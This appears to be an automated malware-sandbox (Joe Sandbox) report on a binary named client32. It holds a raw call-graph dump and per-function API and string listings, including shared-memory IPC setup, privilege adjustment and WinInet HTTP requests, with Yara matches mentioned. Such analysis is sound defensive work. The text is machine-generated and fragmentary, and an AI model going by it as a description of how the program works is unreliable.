EncodePointer __init_pointers _doexit __initp_misc_winsig 125638->125724 125640 11168117 EncodePointer EncodePointer EncodePointer EncodePointer 125725 1116fc72 InitializeCriticalSectionAndSpinCount 125640->125725 125642 11168156 125643 111681bd 125642->125643 125644 1116815a DecodePointer 125642->125644 125727 11167d2b 70 API calls _free 125643->125727 125646 1116816f 125644->125646 125646->125643 125647 1116649e __calloc_crt 66 API calls 125646->125647 125648 11168185 125647->125648 125648->125643 125649 1116818d DecodePointer 125648->125649 125650 1116819e 125649->125650 125650->125643 125651 111681a2 125650->125651 125726 11167d68 66 API calls 4 library calls 125651->125726 125653 111681aa GetCurrentThreadId 125653->125636 125655 11173691 WideCharToMultiByte 125654->125655 125660 11165bdc 125654->125660 125657 111736c6 125655->125657 125658 111736fe FreeEnvironmentStringsW 125655->125658 125659 11166459 __malloc_crt 66 API calls 125657->125659 125658->125660 125661 111736cc 125659->125661 125667 1116d879 GetStartupInfoW 125660->125667 125661->125658 125662 111736d4 WideCharToMultiByte 125661->125662 125663 111736e6 125662->125663 125664 111736f2 FreeEnvironmentStringsW 125662->125664 125665 1115f2c5 _free 66 API calls 125663->125665 125664->125660 125666 111736ee 125665->125666 125666->125664 125668 1116649e __calloc_crt 66 API calls 125667->125668 125674 1116d897 125668->125674 125669 11165be6 125669->125610 125680 111735ba 125669->125680 125670 1116da42 GetStdHandle 125673 1116da0c 125670->125673 125671 1116649e __calloc_crt 66 API calls 125671->125674 125672 1116daa6 SetHandleCount 125672->125669 125673->125670 125673->125672 125675 1116da54 GetFileType 125673->125675 125679 1116da7a InitializeCriticalSectionAndSpinCount 125673->125679 125674->125669 125674->125671 125674->125673 125678 1116d98c 125674->125678 125675->125673 125676 1116d9c3 InitializeCriticalSectionAndSpinCount 125676->125669 125676->125678 125677 1116d9b8 GetFileType 125677->125676 125677->125678 125678->125673 125678->125676 125678->125677 125679->125669 125679->125673 125681 111735d4 GetModuleFileNameA 125680->125681 125682 111735cf 125680->125682 125684 111735fb 125681->125684 125734 1116d294 94 API calls __setmbcp 125682->125734 125728 11173420 125684->125728 125686 11165bf6 125686->125614 125691 11173344 125686->125691 125688 11166459 __malloc_crt 66 API calls 125689 1117363d 125688->125689 125689->125686 125690 11173420 _parse_cmdline 76 API calls 125689->125690 125690->125686 125692 1117334d 125691->125692 125694 11173352 _strlen 125691->125694 125736 1116d294 94 API calls __setmbcp 125692->125736 125695 1116649e __calloc_crt 66 API calls 125694->125695 125698 11165bff 125694->125698 125700 11173387 _strlen 125695->125700 125696 111733d6 125697 1115f2c5 _free 66 API calls 125696->125697 125697->125698 125698->125614 125707 11169c8e 125698->125707 125699 1116649e __calloc_crt 66 API calls 125699->125700 125700->125696 125700->125698 125700->125699 125701 111733fc 125700->125701 125702 1116857f _strcpy_s 66 API calls 125700->125702 125704 11173413 125700->125704 125703 1115f2c5 _free 66 API calls 125701->125703 125702->125700 125703->125698 125705 1116a592 __invoke_watson 10 API calls 125704->125705 125706 1117341f 125705->125706 125708 11169c9c __IsNonwritableInCurrentImage 125707->125708 125737 111690ab EncodePointer 125708->125737 125710 11169cba __initterm_e 125712 11169cdb __IsNonwritableInCurrentImage 125710->125712 125738 1115f5f5 76 API calls __cinit 125710->125738 125712->125614 125713->125586 125714->125592 125715->125610 125716->125580 125717->125593 125718->125597 125719->125585 125720->125586 125721->125609 125722->125586 125723->125634 125724->125640 125725->125642 125726->125653 125727->125636 125730 1117343f 125728->125730 125733 111734ac 125730->125733 125735 11172db1 76 API calls x_ismbbtype_l 125730->125735 125731 111735aa 125731->125686 125731->125688 125732 11172db1 76 API calls _parse_cmdline 125732->125733 125733->125731 125733->125732 125734->125681 125735->125730 125736->125694 125737->125710 125738->125712 125740 1110c814 EnterCriticalSection 125739->125740 125741 1110c7ff InitializeCriticalSection 125739->125741 125742 1110c835 125740->125742 125741->125740 125743 1110c863 LeaveCriticalSection 125742->125743 125744 1110c770 ___DllMainCRTStartup 4 API calls 125742->125744 125743->125626 125744->125742 125745 6ce01dfc 125746 6ce0c840 125745->125746 125747 6ce01e0b 125745->125747 125787 6ce0c84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 125746->125787 125752 6ce01d3f 125747->125752 125750 6ce01e16 125751 6ce0c845 125751->125751 125753 6ce01d4b __heapwalk 125752->125753 125754 6ce0b8b1 125753->125754 125755 6ce01d57 125753->125755 125794 6ce0b359 HeapCreate 125754->125794 125756 6ce01d61 125755->125756 125761 6ce0b911 125755->125761 125758 6ce02967 125756->125758 125759 6ce01d6a __set_flsgetvalue TlsGetValue 125756->125759 125767 6ce01dd1 __heapwalk 125758->125767 125795 6ce028f9 43 API calls __threadstart@4 125758->125795 125764 6ce01d83 125759->125764 125760 6ce0b8b6 125773 6ce17b77 125760->125773 125781 6ce0b8dd GetCommandLineA GetCommandLineW 125760->125781 125762 6ce27448 _cexit 125761->125762 125765 6ce17b4e 125761->125765 125761->125773 125762->125765 125764->125767 125788 6ce01e1c 125764->125788 125771 6ce17b5c 125765->125771 125800 6ce76d78 DeleteCriticalSection free 125765->125800 125767->125750 125770 6ce27457 125801 6ce4c335 DeleteCriticalSection free DeleteCriticalSection DecodePointer TlsFree 125770->125801 125771->125750 125797 6ce76d78 DeleteCriticalSection free 125773->125797 125798 6ce766ba HeapDestroy 125773->125798 125799 6ce4c335 DeleteCriticalSection free DeleteCriticalSection DecodePointer TlsFree 125773->125799 125776 6ce01d9f DecodePointer 125780 6ce01db4 125776->125780 125778 6ce2745c 125802 6ce766ba HeapDestroy 125778->125802 125783 6ce27484 free 125780->125783 125784 6ce01dbc _initptd GetCurrentThreadId 125780->125784 125785 6ce0b8fd 125781->125785 125782 6ce27461 125782->125783 125783->125773 125784->125767 125785->125773 125796 6ce0c427 14 API calls 125785->125796 125787->125751 125790 6ce01e25 125788->125790 125791 6ce01d93 125790->125791 125792 6ce2f1d0 Sleep 125790->125792 125803 6ce009a9 125790->125803 125791->125773 125791->125776 125793 6ce01e45 125792->125793 125793->125790 125793->125791 125794->125760 125795->125767 125796->125761 125797->125773 125798->125773 125799->125773 125800->125770 125801->125778 125802->125782 125804 6ce009b5 125803->125804 125806 6ce009c5 125803->125806 125805 6ce2f3d7 125804->125805 125804->125806 125812 6ce00815 10 API calls _asctime 125805->125812 125807 6ce009df RtlAllocateHeap 125806->125807 125809 6ce2f3f5 _callnewh 125806->125809 125810 6ce009f6 125806->125810 125807->125806 125807->125810 125809->125806 125809->125810 125810->125790 125811 6ce2f3dc 125811->125790 125812->125811

                                                                                                            Executed Functions

                                                                                                            Function 1109D240 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 713 1109d240-1109d2a2 call 1109ca30 716 1109d2a8-1109d2cb call 1109c4f0 713->716 717 1109d8c0 713->717 722 1109d2d1-1109d2e5 LocalAlloc 716->722 723 1109d434-1109d436 716->723 719 1109d8c2-1109d8dd call 1115e3e1 717->719 725 1109d2eb-1109d31d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 722->725 726 1109d8b5-1109d8bb call 1109c580 722->726 727 1109d3c6-1109d3eb CreateFileMappingA 723->727 730 1109d3aa-1109d3c0 725->730 731 1109d323-1109d34e call 1109c460 call 1109c4a0 725->731 726->717 728 1109d438-1109d44b GetLastError 727->728 729 1109d3ed-1109d40d GetLastError call 1100d810 727->729 735 1109d44d 728->735 736 1109d452-1109d469 MapViewOfFile 728->736 741 1109d418-1109d420 729->741 742 1109d40f-1109d416 LocalFree 729->742 730->727 762 1109d399-1109d3a1 731->762 763 1109d350-1109d386 GetSecurityDescriptorSacl 731->763 735->736 739 1109d46b-1109d486 call 1100d810 736->739 740 1109d4a7-1109d4af 736->740 756 1109d488-1109d489 LocalFree 739->756 757 1109d48b-1109d493 739->757 743 1109d551-1109d563 740->743 744 1109d4b5-1109d4ce GetModuleFileNameA 740->744 752 1109d422-1109d423 LocalFree 741->752 753 1109d425-1109d42f 741->753 742->741 748 1109d5a9-1109d5c2 call 1115e400 GetTickCount 743->748 749 1109d565-1109d568 743->749 750 1109d56d-1109d588 call 1100d810 744->750 751 1109d4d4-1109d4dd 744->751 774 1109d5c4-1109d5c9 748->774 758 1109d64f-1109d6b3 GetCurrentProcessId GetModuleFileNameA call 1109c8c0 749->758 778 1109d58a-1109d58b LocalFree 750->778 779 1109d58d-1109d595 750->779 751->750 759 1109d4e3-1109d4e6 751->759 752->753 761 1109d8ae-1109d8b0 call 1109c970 753->761 756->757 766 1109d498-1109d4a2 757->766 767 1109d495-1109d496 LocalFree 757->767 783 1109d6bb-1109d6d2 CreateEventA 758->783 784 1109d6b5 758->784 769 1109d529-1109d54c call 1100d810 call 1109c970 759->769 770 1109d4e8-1109d4ec 759->770 761->726 762->730 764 1109d3a3-1109d3a4 FreeLibrary 762->764 763->762 773 1109d388-1109d393 SetSecurityDescriptorSacl 763->773 764->730 766->761 767->766 769->743 770->769 777 1109d4ee-1109d4f9 770->777 773->762 780 1109d5cb-1109d5da 774->780 781 1109d5dc 774->781 785 1109d500-1109d504 777->785 778->779 786 1109d59a-1109d5a4 779->786 787 1109d597-1109d598 LocalFree 779->787 780->774 780->781 788 1109d5de-1109d5e4 781->788 792 1109d6d4-1109d6f3 GetLastError * 2 call 1100d810 783->792 793 1109d6f6-1109d6fe 783->793 784->783 790 1109d520-1109d522 785->790 791 1109d506-1109d508 785->791 786->761 787->786 797 1109d5f5-1109d64d 788->797 798 1109d5e6-1109d5f3 788->798 794 1109d525-1109d527 790->794 799 1109d50a-1109d510 791->799 800 1109d51c-1109d51e 791->800 792->793 795 1109d700 793->795 796 1109d706-1109d717 CreateEventA 793->796 794->750 794->769 795->796 802 1109d719-1109d738 GetLastError * 2 call 1100d810 796->802 803 1109d73b-1109d743 796->803 797->758 798->788 798->797 799->790 804 1109d512-1109d51a 799->804 800->794 802->803 807 1109d74b-1109d75d CreateEventA 803->807 808 1109d745 803->808 804->785 804->800 810 1109d75f-1109d77e GetLastError * 2 call 1100d810 807->810 811 1109d781-1109d789 807->811 808->807 810->811 813 1109d78b 811->813 814 1109d791-1109d7a2 CreateEventA 811->814 813->814 816 1109d7c4-1109d7d2 814->816 817 1109d7a4-1109d7c1 GetLastError * 2 call 1100d810 814->817 819 1109d7d4-1109d7d5 LocalFree 816->819 820 1109d7d7-1109d7df 816->820 817->816 819->820 822 1109d7e1-1109d7e2 LocalFree 820->822 823 1109d7e4-1109d7ed 820->823 822->823 824 1109d7f3-1109d7f6 823->824 825 1109d897-1109d8a9 call 1100d810 823->825 824->825 827 1109d7fc-1109d7ff 824->827 825->761 827->825 829 1109d805-1109d808 827->829 829->825 830 1109d80e-1109d811 829->830 831 1109d81c-1109d838 CreateThread 830->831 832 1109d813-1109d819 GetCurrentThreadId 830->832 833 1109d83a-1109d844 831->833 834 1109d846-1109d850 831->834 832->831 833->761 835 1109d86a-1109d895 SetEvent call 1100d810 call 1109c580 834->835 836 1109d852-1109d868 ResetEvent * 3 834->836 835->719 836->835
                                                                                                            APIs
                                                                                                              • Part of subcall function 1109C4F0: GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,B34DC9D5,00080000,00000000,00000000), ref: 1109C51D
                                                                                                              • Part of subcall function 1109C4F0: OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
                                                                                                              • Part of subcall function 1109C4F0: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
                                                                                                              • Part of subcall function 1109C4F0: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,B34DC9D5,00080000,00000000,00000000), ref: 1109D2D5
                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D2EE
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D2F9
                                                                                                            • GetVersionExA.KERNEL32(?), ref: 1109D310
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D37E
                                                                                                            • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D393
                                                                                                            • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D3A4
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,1102FA03,00000004,00000000,?,?), ref: 1109D3E0
                                                                                                            • GetLastError.KERNEL32 ref: 1109D3ED
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D416
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D423
                                                                                                            • GetLastError.KERNEL32 ref: 1109D440
                                                                                                            • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D45E
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D489
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D496
                                                                                                              • Part of subcall function 1109C460: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D32E), ref: 1109C468
                                                                                                              • Part of subcall function 1109C4A0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C4B4
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D4C2
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D58B
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D598
                                                                                                            • _memset.LIBCMT ref: 1109D5B0
                                                                                                            • GetTickCount.KERNEL32 ref: 1109D5B8
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 1109D664
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D67F
                                                                                                            • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D6CB
                                                                                                            • GetLastError.KERNEL32 ref: 1109D6D4
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 1109D6DB
                                                                                                            • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D710
                                                                                                            • GetLastError.KERNEL32 ref: 1109D719
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 1109D720
                                                                                                            • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D756
                                                                                                            • GetLastError.KERNEL32 ref: 1109D75F
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 1109D766
                                                                                                            • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D79B
                                                                                                            • GetLastError.KERNEL32 ref: 1109D7AA
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 1109D7AD
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D7D5
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D7E2
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1109D813
                                                                                                            • CreateThread.KERNEL32(00000000,00002000,Function_0009CDD0,00000000,00000000,00000030), ref: 1109D82D
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D85C
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D862
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D868
                                                                                                            • SetEvent.KERNEL32(?), ref: 1109D86E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                            • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                            • API String ID: 3291243470-2792520954
                                                                                                            • Opcode ID: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                            • Instruction ID: 1c086480991888a7e74c242cefb21caf9cc7b937459cab308f9abb1f8f7b4179
                                                                                                            • Opcode Fuzzy Hash: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                            • Instruction Fuzzy Hash: 7F1282B5E402599FDB20DF65CCD4EAEB7F9BB88308F0089A9E14D97240D771A984CF61
                                                                                                            Function 11029200 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 976 11029200-1102928e LoadLibraryA 977 11029291-11029296 976->977 978 11029298-1102929b 977->978 979 1102929d-110292a0 977->979 980 110292b5-110292ba 978->980 981 110292a2-110292a5 979->981 982 110292a7-110292b2 979->982 983 110292e9-110292f5 980->983 984 110292bc-110292c1 980->984 981->980 982->980 985 1102939a-1102939d 983->985 986 110292fb-11029313 call 1115f231 983->986 987 110292c3-110292da GetProcAddress 984->987 988 110292dc-110292df 984->988 990 110293b8-110293d0 InternetOpenA 985->990 991 1102939f-110293b6 GetProcAddress 985->991 997 11029334-11029340 986->997 998 11029315-1102932e GetProcAddress 986->998 987->988 992 110292e1-110292e3 SetLastError 987->992 988->983 995 110293f4-11029400 call 1115f2c5 990->995 991->990 994 110293e9-110293f1 SetLastError 991->994 992->983 994->995 1004 11029406-11029437 call 1113e630 call 11160a20 995->1004 1005 1102967a-11029684 995->1005 1003 11029342-1102934b GetLastError 997->1003 1006 11029361-11029363 997->1006 998->997 1000 110293d2-110293da SetLastError 998->1000 1000->1003 1003->1006 1007 1102934d-1102935f call 1115f2c5 call 1115f231 1003->1007 1026 11029439-1102943c 1004->1026 1027 1102943f-11029454 call 11080b80 * 2 1004->1027 1005->977 1009 1102968a 1005->1009 1011 11029380-1102938c 1006->1011 1012 11029365-1102937e GetProcAddress 1006->1012 1007->1006 1014 1102969c-1102969f 1009->1014 1011->985 1030 1102938e-11029397 1011->1030 1012->1011 1018 110293df-110293e7 SetLastError 1012->1018 1015 110296a1-110296a6 1014->1015 1016 110296ab-110296ae 1014->1016 1022 1102980f-11029817 1015->1022 1023 110296b0-110296b5 1016->1023 1024 110296ba 1016->1024 1018->985 1028 11029820-11029833 1022->1028 1029 11029819-1102981a FreeLibrary 1022->1029 1031 110297df-110297e4 1023->1031 1032 110296bd-110296c5 1024->1032 1026->1027 1050 11029456-1102945a 1027->1050 1051 1102945d-11029469 1027->1051 1029->1028 1030->985 1037 110297e6-110297fd GetProcAddress 1031->1037 1038 110297ff-11029805 1031->1038 1035 110296c7-110296de GetProcAddress 1032->1035 1036 110296e4-110296ed 1032->1036 1035->1036 1040 1102979e-110297a0 SetLastError 1035->1040 1044 110296f0-110296f2 1036->1044 1037->1038 1041 11029807-11029809 SetLastError 1037->1041 1038->1022 1042 110297a6-110297ad 1040->1042 1041->1022 1046 110297bc-110297d5 call 110274b0 * 2 1042->1046 1044->1042 1048 110296f8-110296fd 1044->1048 1066 110297da-110297dd 1046->1066 1048->1046 1052 11029703-1102973f call 1110c530 call 11027460 1048->1052 1050->1051 1054 11029494-11029499 1051->1054 1055 1102946b-1102946d 1051->1055 1074 11029751-11029753 1052->1074 1075 11029741-11029744 1052->1075 1057 1102949b-110294ac GetProcAddress 1054->1057 1058 110294ae-110294c5 InternetConnectA 1054->1058 1060 11029484-1102948a 1055->1060 1061 1102946f-11029482 GetProcAddress 1055->1061 1057->1058 1063 110294f1-110294fc SetLastError 1057->1063 1064 11029667-11029677 call 1115dfa1 1058->1064 1065 110294cb-110294ce 1058->1065 1060->1054 1061->1060 1067 1102948c-1102948e SetLastError 1061->1067 1063->1064 1064->1005 1070 110294d0-110294d2 1065->1070 1071 11029509-11029511 1065->1071 1066->1031 1067->1054 1076 110294d4-110294e7 GetProcAddress 1070->1076 1077 110294e9-110294ef 1070->1077 1078 11029513-11029527 GetProcAddress 1071->1078 1079 11029529-11029544 1071->1079 1082 11029755 1074->1082 1083 1102975c-11029761 1074->1083 1075->1074 1081 11029746-1102974a 1075->1081 1076->1077 1084 11029501-11029503 SetLastError 1076->1084 1077->1071 1078->1079 1085 11029546-1102954e SetLastError 1078->1085 1086 11029551-11029554 1079->1086 1081->1074 1087 1102974c 1081->1087 1082->1083 1088 11029763-11029779 call 110cec50 1083->1088 1089 1102977c-1102977e 1083->1089 1084->1071 1085->1086 1092 11029662-11029665 1086->1092 1093 1102955a-1102955f 1086->1093 1087->1074 1088->1089 1095 11029780-11029782 1089->1095 1096 11029784-11029795 call 1115dfa1 1089->1096 1092->1064 1099 1102968c-11029699 call 1115dfa1 1092->1099 1097 11029561-11029578 GetProcAddress 1093->1097 1098 1102957a-11029586 1093->1098 1095->1096 1101 110297af-110297b9 call 1115dfa1 1095->1101 1096->1046 1111 11029797-11029799 1096->1111 1097->1098 1103 11029588-11029590 SetLastError 1097->1103 1110 11029592-110295ab GetLastError 1098->1110 1099->1014 1101->1046 1103->1110 1112 110295c6-110295db 1110->1112 1113 110295ad-110295c4 GetProcAddress 1110->1113 1111->1032 1116 110295e5-110295f3 GetLastError 1112->1116 1113->1112 1114 110295dd-110295df SetLastError 1113->1114 1114->1116 1117 110295f5-110295fa 1116->1117 1118 110295fc-11029608 GetDesktopWindow 1116->1118 1117->1118 1121 11029652-11029657 1117->1121 1119 11029623-1102963f 1118->1119 1120 1102960a-11029621 GetProcAddress 1118->1120 1119->1092 1125 11029641 1119->1125 1120->1119 1122 11029646-11029650 SetLastError 1120->1122 1121->1092 1123 11029659-1102965f 1121->1123 1122->1092 1123->1092 1125->1086
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(WinInet.dll,B34DC9D5,759223A0,?,00000000), ref: 11029235
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110292E3
                                                                                                            • _malloc.LIBCMT ref: 11029307
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029321
                                                                                                            • GetLastError.KERNEL32 ref: 11029342
                                                                                                            • _free.LIBCMT ref: 1102934E
                                                                                                            • _malloc.LIBCMT ref: 11029357
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029371
                                                                                                            • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
                                                                                                            • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293D4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293E1
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293EB
                                                                                                            • _free.LIBCMT ref: 110293F5
                                                                                                              • Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
                                                                                                              • Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029475
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 1102948E
                                                                                                            • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
                                                                                                            • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294DA
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110294F3
                                                                                                            • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
                                                                                                            • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110296D3
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110297A0
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110297F2
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 11029809
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1102981A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                            • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                            • API String ID: 921868004-913974648
                                                                                                            • Opcode ID: 4323dc13209f1141cde394b290c5c300ebcb294d4ba28f398435307f7bbc8dca
                                                                                                            • Instruction ID: 1a6f29b930c56522642f3e0528693d97e2c9ce6eee6fc69bea7c9705341dbda6
                                                                                                            • Opcode Fuzzy Hash: 4323dc13209f1141cde394b290c5c300ebcb294d4ba28f398435307f7bbc8dca
                                                                                                            • Instruction Fuzzy Hash: 3C128EB0D002299BDB11CFA9CC88A9EFBF8FF89344F60856AE555F7240EB745941CB61
                                                                                                            Function 110612D0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 11141240: GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11141275
                                                                                                              • Part of subcall function 11141240: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 11141285
                                                                                                            • _fgets.LIBCMT ref: 11061402
